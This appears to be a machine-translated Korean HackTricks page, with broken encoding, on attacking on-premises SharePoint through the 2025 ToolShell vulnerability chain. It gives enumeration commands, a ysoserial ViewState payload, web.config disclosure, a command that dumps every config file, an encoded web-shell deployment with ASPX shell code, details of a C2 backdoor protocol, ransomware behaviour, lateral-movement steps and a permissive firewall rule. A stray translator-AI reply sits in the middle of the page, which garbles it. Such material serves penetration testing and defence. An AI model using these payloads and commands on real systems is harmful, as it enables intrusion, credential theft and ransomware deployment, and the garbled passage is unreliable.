Microsoft SharePoint โ€“ Pentesting & Exploitation

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

Microsoft SharePoint (on-premises)์€ ASP.NET/IIS ์œ„์— ๊ตฌ์ถ•๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ๋Œ€๋ถ€๋ถ„์˜ ๊ณ ์ „์ ์ธ ์›น ๊ณต๊ฒฉ ํ‘œ๋ฉด(ViewState, Web.Config, web shells ๋“ฑ)์€ ์กด์žฌํ•˜์ง€๋งŒ, SharePoint๋Š” ์ˆ˜๋ฐฑ ๊ฐœ์˜ ๋…์  ASPX ํŽ˜์ด์ง€์™€ ์›น ์„œ๋น„์Šค๋„ ํฌํ•จํ•˜์—ฌ ๋…ธ์ถœ๋œ ๊ณต๊ฒฉ ํ‘œ๋ฉด์„ ํฌ๊ฒŒ ํ™•์žฅํ•ฉ๋‹ˆ๋‹ค. ์ด ํŽ˜์ด์ง€๋Š” SharePoint ํ™˜๊ฒฝ ๋‚ด๋ถ€์—์„œ enumerate, exploit ๋ฐ persistํ•˜๊ธฐ ์œ„ํ•œ ์‹ค์šฉ์ ์ธ ๊ธฐ๋ฒ•๋“ค์„ ๋ชจ์•„๋‘์—ˆ์œผ๋ฉฐ, Unit42๊ฐ€ ๊ณต๊ฐœํ•œ 2025 exploit chain (CVE-2025-49704/49706/53770/53771)์„ ์ค‘์ ์ ์œผ๋กœ ๋‹ค๋ฃน๋‹ˆ๋‹ค.

1. ๋น ๋ฅธ ์—ด๊ฑฐ

# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI

# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# interesting standard paths
/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx                     # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx

# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. 2025 ์ต์Šคํ”Œ๋กœ์ž‡ ์ฒด์ธ (a.k.a. โ€œToolShellโ€)

2.1 CVE-2025-49704 โ€“ Code Injection on ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=โ€ฆ&DefaultWebPartId=<payload> ์€ ํŽ˜์ด์ง€์— ์ž„์˜์˜ Server-Side Include ์ฝ”๋“œ๋ฅผ ์ฃผ์ž…ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜๋ฉฐ, ์ด ์ฝ”๋“œ๋Š” ์ดํ›„ ASP.NET์— ์˜ํ•ด ์ปดํŒŒ์ผ๋ฉ๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” Process.Start()๋ฅผ ์‹คํ–‰ํ•˜๋Š” C#์„ ์ž„๋ฒ ๋“œํ•˜๊ณ  ์•…์„ฑ ViewState๋ฅผ ์ „์†กํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

2.2 CVE-2025-49706 โ€“ Improper Authentication Bypass

๊ฐ™์€ ํŽ˜์ด์ง€๋Š” ์‚ฌ์ดํŠธ ์ปจํ…์ŠคํŠธ๋ฅผ ๊ฒฐ์ •ํ•˜๊ธฐ ์œ„ํ•ด X-Forms_BaseUrl ํ—ค๋”๋ฅผ ์‹ ๋ขฐํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ /_layouts/15/๋กœ ์ง€์ •ํ•˜๋ฉด ๋ฃจํŠธ ์‚ฌ์ดํŠธ์—์„œ ์ ์šฉ๋˜๋Š” MFA/SSO๋ฅผ unauthenticated ์ƒํƒœ๋กœ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

2.3 CVE-2025-53770 โ€“ ์ธ์ฆ๋˜์ง€ ์•Š์€ ViewState Deserialization โ†’ RCE

๊ณต๊ฒฉ์ž๊ฐ€ ToolPane.aspx ๋‚ด์˜ gadget์„ ์ œ์–ดํ•˜๋ฉด unsigned (๋˜๋Š” MAC-only) __VIEWSTATE ๊ฐ’์„ ์ „์†กํ•˜์—ฌ w3wp.exe ๋‚ด๋ถ€์—์„œ .NET deserialization์„ ์œ ๋ฐœํ•˜๊ณ  ์ฝ”๋“œ ์‹คํ–‰์œผ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์„œ๋ช…์ด ํ™œ์„ฑํ™”๋œ ๊ฒฝ์šฐ, ์–ด๋–ค web.config์—์„œ๋“  ValidationKey/DecryptionKey๋ฅผ ํƒˆ์ทจ(2.4 ์ฐธ์กฐ)ํ•˜๊ณ  ysoserial.net ๋˜๋Š” ysodom์œผ๋กœ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์œ„์กฐํ•ฉ๋‹ˆ๋‹ค:

ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

For an in-depth explanation on abusing ASP.NET ViewState read:

Exploiting __VIEWSTATE without knowing the secrets

2.4 CVE-2025-53771 โ€“ Path Traversal / web.config Disclosure

์ •๊ตํ•˜๊ฒŒ ๋งŒ๋“  Source ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ToolPane.aspx์— ์ „์†กํ•˜๋ฉด(e.g. ../../../../web.config) ๋Œ€์ƒ ํŒŒ์ผ์ด ๋ฐ˜ํ™˜๋˜์–ด ๋‹ค์Œ ํ•ญ๋ชฉ์˜ leakage๋ฅผ ํ—ˆ์šฉํ•œ๋‹ค:

  • <machineKey validationKey="โ€ฆ" decryptionKey="โ€ฆ"> โžœ forge ViewState / ASPXAUTH cookies
  • connection strings & secrets.

2.5 ToolShell workflow observed in Ink Dragon intrusions

Check Point๋Š” Ink Dragon์ด Microsoft๊ฐ€ ํŒจ์น˜๋ฅผ ๋ฐฐํฌํ•˜๊ธฐ ์ˆ˜๊ฐœ์›” ์ „์— ToolShell ์ฒด์ธ์„ ์–ด๋–ป๊ฒŒ ์šด์˜ํ–ˆ๋Š”์ง€ ๋งตํ•‘ํ–ˆ๋‹ค:

  • Header spoofing for auth bypass โ€“ ๊ณต๊ฒฉ์ž๋Š” /_layouts/15/ToolPane.aspx๋กœ POST๋ฅผ ์ „์†กํ•˜๋ฉด์„œ Referer: https://<victim>/_layouts/15/์™€ ์œ„์กฐ๋œ X-Forms_BaseUrl๋ฅผ ํ•จ๊ป˜ ๋ณด๋‚ธ๋‹ค. ํ•ด๋‹น ํ—ค๋”๋“ค์€ SharePoint์—๊ฒŒ ์š”์ฒญ์ด ์‹ ๋ขฐ๋œ layout์—์„œ ์™”๋‹ค๊ณ  ํŒ๋‹จํ•˜๊ฒŒ ํ•˜๋ฉฐ front-door ์ธ์ฆ์„ ์™„์ „ํžˆ ์šฐํšŒ์‹œํ‚จ๋‹ค (CVE-2025-49706/CVE-2025-53771).
  • Serialized gadget in the same request โ€“ ์š”์ฒญ ๋ณธ๋ฌธ์—๋Š” ๊ณต๊ฒฉ์ž๊ฐ€ ์ œ์–ดํ•˜๋Š” ViewState/ToolPart ๋ฐ์ดํ„ฐ๊ฐ€ ํฌํ•จ๋˜์–ด ์ทจ์•ฝํ•œ ์„œ๋ฒ„์ธก formatter์— ๋„๋‹ฌํ•œ๋‹ค (CVE-2025-49704/CVE-2025-53770). ํŽ˜์ด๋กœ๋“œ๋Š” ๋ณดํ†ต ysoserial.net ์ฒด์ธ์œผ๋กœ, w3wp.exe ๋‚ด๋ถ€์—์„œ ๋””์Šคํฌ์— ์“ฐ์ง€ ์•Š๊ณ  ์‹คํ–‰๋œ๋‹ค.
  • Internet-scale scanning โ€“ 2025๋…„ 7์›”์˜ ํ…”๋ ˆ๋ฉ”ํŠธ๋ฆฌ๋Š” ๊ทธ๋“ค์ด ์ ‘๊ทผ ๊ฐ€๋Šฅํ•œ ๋ชจ๋“  /_layouts/15/ToolPane.aspx ์—”๋“œํฌ์ธํŠธ๋ฅผ ์—ด๊ฑฐํ•˜๊ณ  leaked <machineKey> ์Œ์˜ ์‚ฌ์ „์„ ์žฌ์ƒํ•˜๊ณ  ์žˆ์Œ์„ ๋ณด์—ฌ์ค€๋‹ค. ๋ฌธ์„œ์—์„œ ์ƒ˜ํ”Œ validationKey๋ฅผ ๋ณต์‚ฌํ•ด ์‚ฌ์šฉํ•œ ์‚ฌ์ดํŠธ๋Š” ๋‹ค๋ฅธ ๋ถ€๋ถ„์ด ์™„์ „ํžˆ ํŒจ์น˜๋˜์–ด ์žˆ๋”๋ผ๋„ ํƒˆ์ทจ๋  ์ˆ˜ ์žˆ๋‹ค (์„œ๋ช… ์›Œํฌํ”Œ๋กœ์šฐ๋Š” ViewState ํŽ˜์ด์ง€ ์ฐธ์กฐ).
  • Immediate staging โ€“ ์„ฑ๊ณต์ ์ธ ์ต์Šคํ”Œ๋กœ์ž‡์€ ๋กœ๋”๋‚˜ PowerShell stager๋ฅผ ๋–จ์–ด๋œจ๋ฆฌ๋ฉฐ, ์ด๋Š” (1) ๋ชจ๋“  web.config๋ฅผ ๋คํ”„ํ•˜๊ณ , (2) ๋น„์ƒ ์ ‘๊ทผ์šฉ ASPX webshell์„ ์‹ฌ๊ณ , (3) IIS ์›Œ์ปค์—์„œ ํƒˆ์ถœํ•˜๊ธฐ ์œ„ํ•œ ๋กœ์ปฌ Potato privesc๋ฅผ ์˜ˆ์•ฝํ•œ๋‹ค.

3. Post-exploitation recipes observed in the wild

3.1 Exfiltrate every .config file (variation-1)

cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

๊ฒฐ๊ณผ๋ฌผ์ธ debug_dev.js๋Š” ์ต๋ช…์œผ๋กœ ๋‹ค์šด๋กœ๋“œํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ ๋ชจ๋“  ๋ฏผ๊ฐํ•œ ์„ค์ •์„ ํฌํ•จํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

3.2 Base64-encoded ASPX web shell (variation-2) ๋ฐฐํฌ

powershell.exe -EncodedCommand <base64>

๋””์ฝ”๋”ฉ๋œ ํŽ˜์ด๋กœ๋“œ ์˜ˆ์‹œ (์ถ•์•ฝ๋จ):

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
Response.Write(MachineKey.ValidationKey);
// echo secrets or invoke cmd
}
</script>

I donโ€™t see the file content to translate. Please paste the markdown/text from src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md (or specify the sections to translate), and Iโ€™ll translate it to Korean while preserving all tags, links, code and paths exactly.

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

The shell exposes endpoints to read / rotate machine keys which allows forging ViewState and ASPXAUTH cookies across the farm.

3.3 ๋‚œ๋…ํ™” ๋ณ€ํ˜• (variation-3)

๋™์ผํ•œ ์…ธ์ด์ง€๋งŒ:

  • ๋‹ค์Œ ๊ฒฝ๋กœ์— ๋ฐฐ์น˜๋จ: ...\15\TEMPLATE\LAYOUTS\
  • ๋ณ€์ˆ˜ ์ด๋ฆ„์„ ํ•œ ๊ธ€์ž๋กœ ์ถ•์†Œ
  • ์ƒŒ๋“œ๋ฐ•์Šค ํšŒํ”ผ ๋ฐ ํƒ€์ด๋ฐ ๊ธฐ๋ฐ˜ AV ์šฐํšŒ๋ฅผ ์œ„ํ•ด Thread.Sleep(<ms>) ์ถ”๊ฐ€๋จ.

3.4 AK47C2 ๋‹ค์ค‘ ํ”„๋กœํ† ์ฝœ ๋ฐฑ๋„์–ด & X2ANYLOCK ransomware (๊ด€์ฐฐ๋œ ์‹œ๊ธฐ 2025-2026)

์ตœ๊ทผ ์ธ์‹œ๋˜ํŠธ ๋Œ€์‘ ์กฐ์‚ฌ(Unit42 โ€œProject AK47โ€)๋Š” ๊ณต๊ฒฉ์ž๋“ค์ด ์ดˆ๊ธฐ RCE ์ดํ›„ ToolShell ์ฒด์ธ์„ ํ™œ์šฉํ•ด SharePoint ํ™˜๊ฒฝ์— dual-channel C2 ์ž„ํ”Œ๋ž€ํŠธ์™€ ransomware๋ฅผ ๋ฐฐํฌํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ๋ณด์—ฌ์ค€๋‹ค:

AK47C2 โ€“ dnsclient ๋ณ€ํ˜•

  • ํ•˜๋“œ์ฝ”๋”ฉ๋œ DNS ์„œ๋ฒ„: 10.7.66.10 โ€” ๊ถŒํ•œ ๋„๋ฉ”์ธ update.updatemicfosoft.com์™€ ํ†ต์‹ .
  • ๋ฉ”์‹œ์ง€๋Š” JSON ๊ฐ์ฒด์ด๋ฉฐ static key VHBD@H๋กœ XOR ์•”ํ˜ธํ™”๋˜๊ณ , hex ์ธ์ฝ”๋”ฉ๋˜์–ด sub-domain labels๋กœ ์ž„๋ฒ ๋“œ๋จ.
{"cmd":"<COMMAND>","cmd_id":"<ID>"}
  • ๊ธด ์ฟผ๋ฆฌ๋Š” ๋ถ„ํ• ๋˜์–ด s๋กœ ์ ‘๋‘์‚ฌ ์ฒ˜๋ฆฌ๋˜๋ฉฐ ์„œ๋ฒ„ ์ธก์—์„œ ์žฌ์กฐ๋ฆฝ๋จ.
  • ์„œ๋ฒ„๋Š” ๋™์ผํ•œ XOR/hex ์Šคํ‚ด์„ ์‚ฌ์šฉํ•˜๋Š” TXT ๋ ˆ์ฝ”๋“œ๋กœ ์‘๋‹ต:
{"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
  • ๋ฒ„์ „ 202504์€ ๊ฐ„์†Œํ™”๋œ ํ˜•์‹ <COMMAND>::<SESSION_KEY>์™€ ์ฒญํฌ ๋งˆ์ปค 1, 2, a๋ฅผ ๋„์ž…ํ•จ.

AK47C2 โ€“ httpclient ๋ณ€ํ˜•

  • ๋™์ผํ•œ JSON & XOR ๋ฃจํ‹ด์„ ์žฌ์‚ฌ์šฉํ•˜์ง€๋งŒ hex blob์„ libcurl์˜ HTTP POST body(์˜ˆ: CURLOPT_POSTFIELDS)๋กœ ์ „์†กํ•จ.
  • ๋™์ผํ•œ ์ž‘์—…/๊ฒฐ๊ณผ ์›Œํฌํ”Œ๋กœ๋กœ ๋‹ค์Œ์„ ํ—ˆ์šฉ:
    • ์ž„์˜์˜ ์…ธ ๋ช…๋ น ์‹คํ–‰.
    • ๋™์  sleep ๊ฐ„๊ฒฉ ๋ฐ kill-switch ์ง€์‹œ.

X2ANYLOCK ransomware

  • 64-bit C++ ํŽ˜์ด๋กœ๋“œ๊ฐ€ DLL side-loading์„ ํ†ตํ•ด ๋กœ๋“œ๋จ(์•„๋ž˜ ์ฐธ์กฐ).
  • ํŒŒ์ผ ๋ฐ์ดํ„ฐ์— AES-CBC๋ฅผ ์‚ฌ์šฉํ•˜๊ณ  AES ํ‚ค๋ฅผ ๋žฉํ•‘ํ•˜๋Š” ๋ฐ RSA-2048์„ ์‚ฌ์šฉํ•œ ๋’ค ํ™•์žฅ์ž .x2anylock๋ฅผ ์ถ”๊ฐ€ํ•จ.
  • ๋กœ์ปฌ ๋“œ๋ผ์ด๋ธŒ์™€ ๋ฐœ๊ฒฌ๋œ SMB ๊ณต์œ ๋ฅผ ์žฌ๊ท€์ ์œผ๋กœ ์•”ํ˜ธํ™”; ์‹œ์Šคํ…œ ๊ฒฝ๋กœ๋Š” ๊ฑด๋„ˆ๋œ€.
  • ํ˜‘์ƒ์šฉ static Tox ID๋ฅผ ํฌํ•จํ•œ ํ‰๋ฌธ ๋…ธํŠธ How to decrypt my data.txt๋ฅผ ๋‚จ๊น€.
  • ๋‚ด๋ถ€ kill-switch ํฌํ•จ:
if (file_mod_time >= "2026-06-06") exit(0);

DLL side-loading chain

  1. ๊ณต๊ฒฉ์ž๋Š” ํ•ฉ๋ฒ•์ ์ธ 7z.exe ์˜†์— dllhijacked.dll/My7zdllhijacked.dll๋ฅผ ์ƒ์„ฑ.
  2. SharePoint๊ฐ€ ์ƒ์„ฑํ•œ w3wp.exe๊ฐ€ 7z.exe๋ฅผ ์‹คํ–‰ํ•˜๊ณ , Windows ๊ฒ€์ƒ‰ ์ˆœ์„œ ๋•Œ๋ฌธ์— ์•…์„ฑ DLL์ด ๋กœ๋“œ๋˜์–ด ๋ฉ”๋ชจ๋ฆฌ์—์„œ ransomware ์—”ํŠธ๋ฆฌํฌ์ธํŠธ๋ฅผ ํ˜ธ์ถœํ•จ.
  3. ๋ณ„๋„์˜ LockBit ๋กœ๋”(bbb.msi โžœ clink_x86.exe โžœ clink_dll_x86.dll)๊ฐ€ ์‰˜์ฝ”๋“œ๋ฅผ ๋ณตํ˜ธํ™”ํ•˜๊ณ  LockBit 3.0์„ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•ด d3dl1.dll์— DLL hollowing์„ ์ˆ˜ํ–‰ํ•จ.

[!INFO] X2ANYLOCK์—์„œ ๋ฐœ๊ฒฌ๋œ ๋™์ผํ•œ static Tox ID๊ฐ€ leaked LockBit databases์—์„œ๋„ ๋‚˜ํƒ€๋‚˜๋ฉฐ, ์ œํœด์ž(affiliate) ๊ฒน์นจ์„ ์‹œ์‚ฌํ•จ.

3.5 SharePoint loot๋ฅผ ์ด์šฉํ•œ lateral movement

  • Decrypt every protected section โ€“ ์›น ํ‹ฐ์–ด์— ์ž๋ฆฌ ์žก์œผ๋ฉด aspnet_regiis.exe -px "connectionStrings" C:\\temp\\conn.xml -pri (๋˜๋Š” -px "appSettings")๋ฅผ ์•…์šฉํ•ด <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider"> ๋’ค์— ์ˆจ์€ ํ‰๋ฌธ ๋น„๋ฐ€์„ ๋คํ”„ํ•˜๋ผ. Ink Dragon์€ ์ด ๋ฐฉ๋ฒ•์œผ๋กœ SQL ๋กœ๊ทธ์ธ, SMTP ๋ฆด๋ ˆ์ด ๋ฐ ๋งž์ถค ์„œ๋น„์Šค ์ž๊ฒฉ ์ฆ๋ช…์„ ๋ฐ˜๋ณต์ ์œผ๋กœ ์ˆ˜์ง‘ํ–ˆ๋‹ค.
  • Recycle app-pool accounts across farms โ€“ ๋งŽ์€ ๊ธฐ์—…๋“ค์ด ๋ชจ๋“  ํ”„๋ก ํŠธ์—”๋“œ์—์„œ IIS APPPOOL\SharePoint์— ๊ฐ™์€ ๋„๋ฉ”์ธ ๊ณ„์ •์„ ์žฌ์‚ฌ์šฉํ•œ๋‹ค. identity impersonate="..." ๋ธ”๋ก์„ ๋ณตํ˜ธํ™”ํ•˜๊ฑฐ๋‚˜ ApplicationHost.config๋ฅผ ์ฝ์€ ํ›„ ํ•ด๋‹น ์ž๊ฒฉ์ฆ๋ช…์„ SMB/RDP/WinRM์„ ํ†ตํ•ด ๋‹ค๋ฅธ ์„œ๋ฒ„์— ๋Œ€ํ•ด ํ…Œ์ŠคํŠธํ•˜๋ผ. ์—ฌ๋Ÿฌ ์‚ฌ๋ก€์—์„œ ํ•ด๋‹น ๊ณ„์ •์ด ๋กœ์ปฌ ๊ด€๋ฆฌ์ž์ด๊ธฐ๋„ ํ–ˆ์œผ๋ฉฐ, ์ด๋Š” psexec, sc create ๋˜๋Š” ์Šค์ผ€์ค„๋Ÿฌ ํƒœ์Šคํฌ๋ฅผ ํ†ตํ•œ ์Šคํ…Œ์ด์ง•์„ ๋น„๋ฐ€๋ฒˆํ˜ธ ์Šคํ”„๋ ˆ์ด ์—†์ด ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ–ˆ๋‹ค.
  • Abuse leaked <machineKey> values internally โ€“ ์ธํ„ฐ๋„ท ๊ฒฝ๊ณ„๊ฐ€ ํŒจ์น˜๋˜์–ด๋„ ๋™์ผํ•œ validationKey/decryptionKey๋ฅผ ์žฌ์‚ฌ์šฉํ•˜๋ฉด ์„œ๋กœ ์‹ ๋ขฐํ•˜๋Š” ๋‚ด๋ถ€ SharePoint ์กด ๊ฐ„์— lateral ViewState exploitation์ด ๊ฐ€๋Šฅํ•˜๋‹ค.

3.6 2025 ์นจํ•ด์—์„œ ๊ด€์ฐฐ๋œ ์ง€์†์„ฑ ํŒจํ„ด

  • Scheduled tasks โ€“ SYSCHECK ๊ฐ™์€(ํ˜น์€ ๊ธฐํƒ€ ์ƒํƒœ ๊ด€๋ จ ์ด๋ฆ„) ์ผํšŒ์„ฑ ํƒœ์Šคํฌ๋ฅผ /ru SYSTEM /sc once /st <hh:mm>๋กœ ์ƒ์„ฑํ•ด ๋‹ค์Œ ๋‹จ๊ณ„ ๋กœ๋”(๋Œ€๊ฐœ ์ด๋ฆ„์ด ๋ฐ”๋€ conhost.exe)๋ฅผ ๋ถ€ํŠธ์ŠคํŠธ๋žฉํ•œ๋‹ค. ์ผํšŒ ์‹คํ–‰์ด๊ธฐ ๋•Œ๋ฌธ์— ํžˆ์Šคํ† ๋ฆฌ ํƒœ์Šคํฌ XML์ด ๋ณด์กด๋˜์ง€ ์•Š์œผ๋ฉด ํ…”๋ ˆ๋ฉ”ํŠธ๋ฆฌ๊ฐ€ ๋†“์น˜๊ธฐ ์‰ฝ๋‹ค.
  • Masqueraded services โ€“ WindowsTempUpdate, WaaSMaintainer, MicrosoftTelemetryHost ๊ฐ™์€ ์„œ๋น„์Šค๋ฅผ sc create๋กœ sideloading triad ๋””๋ ‰ํ„ฐ๋ฆฌ๋ฅผ ๊ฐ€๋ฆฌํ‚ค๋„๋ก ์„ค์น˜ํ•œ๋‹ค. ์ด ์‹คํ–‰ํŒŒ์ผ๋“ค์€ ์›๋ž˜์˜ AMD/Realtek/NVIDIA ์„œ๋ช…์„ ์œ ์ง€ํ•˜์ง€๋งŒ Windows ๊ตฌ์„ฑ ์š”์†Œ์— ๋งž์ถฐ ์ด๋ฆ„์ด ๋ฐ”๋€Œ์–ด ์žˆ๋‹ค; ๋””์Šคํฌ ์ƒ์˜ ํŒŒ์ผ๋ช…๊ณผ PE์˜ OriginalFileName ํ•„๋“œ๋ฅผ ๋น„๊ตํ•˜๋ฉด ๋น ๋ฅธ ๋ฌด๊ฒฐ์„ฑ ๊ฒ€์‚ฌ๋กœ ํ™œ์šฉํ•  ์ˆ˜ ์žˆ๋‹ค.

3.7 ๋ฆด๋ ˆ์ด ํŠธ๋ž˜ํ”ฝ์„ ์œ„ํ•œ ํ˜ธ์ŠคํŠธ ๋ฐฉํ™”๋ฒฝ ๋‹ค์šด๊ทธ๋ ˆ์ด๋“œ

Ink Dragon์€ ์ •๊ธฐ์ ์œผ๋กœ Defender ์œ ์ง€๊ด€๋ฆฌ๋กœ ์œ„์žฅํ•œ ํ—ˆ์šฉํ˜• ์•„์›ƒ๋ฐ”์šด๋“œ ๊ทœ์น™์„ ์ถ”๊ฐ€ํ•˜์—ฌ ShadowPad/FinalDraft ํŠธ๋ž˜ํ”ฝ์ด ์–ด๋–ค ํฌํŠธ๋กœ๋“  ์™ธ๋ถ€๋กœ ๋‚˜๊ฐˆ ์ˆ˜ ์žˆ๊ฒŒ ํ•œ๋‹ค:

netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any

์ด ๊ทœ์น™์€ ๋กœ์ปฌ์—์„œ ์ƒ์„ฑ๋˜์—ˆ๊ณ  (GPO๊ฐ€ ์•„๋‹ˆ๋ผ) ์ •์‹ Defender ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ program=์œผ๋กœ ์‚ฌ์šฉํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๋Œ€๋ถ€๋ถ„์˜ SOC ๊ธฐ์ค€์€ ์ด๋ฅผ ๋ฌด์‹œํ•˜์ง€๋งŒ, ๊ทธ๋Ÿผ์—๋„ Any โžœ Any ์•„์›ƒ๋ฐ”์šด๋“œ ํ†ต์‹ ์„ ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค.


๊ด€๋ จ ํŠธ๋ฆญ

  • IIS post-exploitation & web.config abuse:

IIS - Internet Information Services

์ฐธ์กฐ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ